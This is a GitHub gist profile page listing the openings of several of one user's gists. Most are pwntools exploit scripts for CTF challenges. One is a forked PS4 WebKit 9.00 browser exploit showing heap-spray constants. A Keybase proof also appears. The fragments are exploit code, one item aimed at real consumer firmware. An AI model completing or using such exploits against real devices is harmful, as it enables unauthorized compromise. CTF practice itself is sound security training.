Skip to content

Instantly share code, notes, and snippets.

View hkraw's full-sized avatar

Harsh khuha hkraw

55 followers · 6 following
View GitHub Profile
@hkraw
hkraw / ghosparty.cc
Created June 16, 2021 19:02
solve c++ tasks in c++ :P
#include <iostream>
#include <pwntools>
#include <string>
uint64_t vtable_offset = 0x210b60;
uint64_t openat_got_offset = 0x210fe8;
uint64_t libc_open_offset = 0xf6450;
class Ghost {
@hkraw
hkraw / ps4.html
Created October 28, 2021 05:56 — forked from sleirsgoevy/ps4.html
PS4 WebKit exploit on 9.00
<script>
var PAGE_SIZE = 16384;
var SIZEOF_CSS_FONT_FACE = 0xb8;
var HASHMAP_BUCKET = 208;
var STRING_OFFSET = 20;
var SPRAY_FONTS = 0x1000;
var GUESS_FONT = 0x200430000;
var NPAGES = 20;
var INVALID_POINTER = 0;
var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)
@hkraw
hkraw / keybase.md
Created July 1, 2021 09:21

Keybase proof

I hereby claim:

  • I am hkraw on github.
  • I am hk_1 (https://keybase.io/hk_1) on keybase.
  • I have a public key ASAiWZwBEgYD4haHSMpi69K7qQ3kv_AsA1Em2iSRXOwVGgo

To claim this, I am signing this object:

@hkraw
hkraw / moosl-(╯°□°)╯︵ ┻━┻.py
Created May 2, 2021 22:52
#!/usr/bin/env python3
from pwn import *
from binascii import hexlify, unhexlify
context.update(arch='amd64', os='linux')
# helpers
def store(key, keySize, value, valueSize):
io.sendlineafter('option: ','1')
io.sendlineafter('key size: ',str(keySize))
@hkraw
hkraw / PlaidCTF-plaidflix.py
Created April 18, 2021 08:50
#!/usr/bin/python3
from pwn import *
# Helpers
def mangle(addr, value):
return (addr >> 12) ^ value
def demangle(obfus_ptr):
o2 = (obfus_ptr >> 12) ^ obfus_ptr
return (o2 >> 24) ^ o2
@hkraw
hkraw / stonk_market.py
Created March 19, 2021 06:50
from pwn import *
if __name__=="_main__":
# io = process('./vuln')
io = remote('mercury.picoctf.net', 5654)
exe = ELF('./vuln')
io.sendlineafter("portfolio","1");
@hkraw
hkraw / membership.py
Created March 21, 2021 17:12
from pwn import *
from past.builtins import xrange
def a():
io.sendlineafter(')\n>','1')
def e(idx, data):
io.sendlineafter(')\n>','3')
io.sendlineafter('Index: ',str(idx))
io.sendafter('Content: ',data)
@hkraw
hkraw / success.py
Created March 21, 2021 17:04
from pwn import *
import numpy as np
from IO_FILE import *
if __name__ == '__main__':
# io = process('./main2_success')
io = remote("bin.q21.ctfsecurinets.com",1340)
libc = ELF("./libc.so.6")
io.sendafter("Please provide student username: ","AAAAAAAA")
@hkraw
hkraw / duet_expl.py
Last active March 7, 2021 23:28
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from IO_FILE import *
from time import sleep
###Utils
def newins(instrument,data):
io.sendlineafter(': ','1')
io.sendlineafter('Instrument: ',instrument)
@hkraw
hkraw / hiv_expl.py
Created September 26, 2020 08:57
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
#Utils
def create(type,number):
io.sendlineafter('>> ','1')
io.sendlineafter('> ',f'{type}')